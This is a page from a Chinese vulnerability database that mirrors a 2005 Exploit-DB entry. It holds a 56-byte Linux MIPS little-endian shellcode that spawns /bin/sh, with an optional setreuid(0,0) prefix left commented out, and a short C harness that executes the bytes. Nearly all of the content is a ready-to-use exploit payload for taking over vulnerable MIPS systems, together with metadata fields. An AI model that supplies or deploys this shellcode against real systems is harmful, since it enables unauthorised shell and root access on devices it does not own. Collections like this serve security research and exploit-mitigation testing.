Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055445 漏洞类型
发布时间 2005-11-09 更新时间 2005-11-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_MIPS CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13300
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 56 bytes execve /bin/sh shellcode - linux-mipsel
 * - by core (core@bokeoa.com)
 *
 * Note: For MIPS running in little-endian mode.
 * Tested on a Cobalt Qube2 server running Linux 2.4.18
 *
 * Greetz to bighawk... i couldn't get his execve to work 
 * for some reason :/
 */

char code[] =
/* 16 byte setreuid(0,0) by bighawk */
//"\xff\xff\x04\x30\xff\xff\x05\x30"
//"\xe6\x0f\x02\x34\xcc\x48\x49\x03"

/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
"\xff\xff\x10\x04\xab\x0f\x02\x24"
"\x55\xf0\x46\x20\x66\x06\xff\x23"
"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
"/bin/sh";

main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", sizeof(code));
  a();
}

// milw0rm.com [2005-11-09]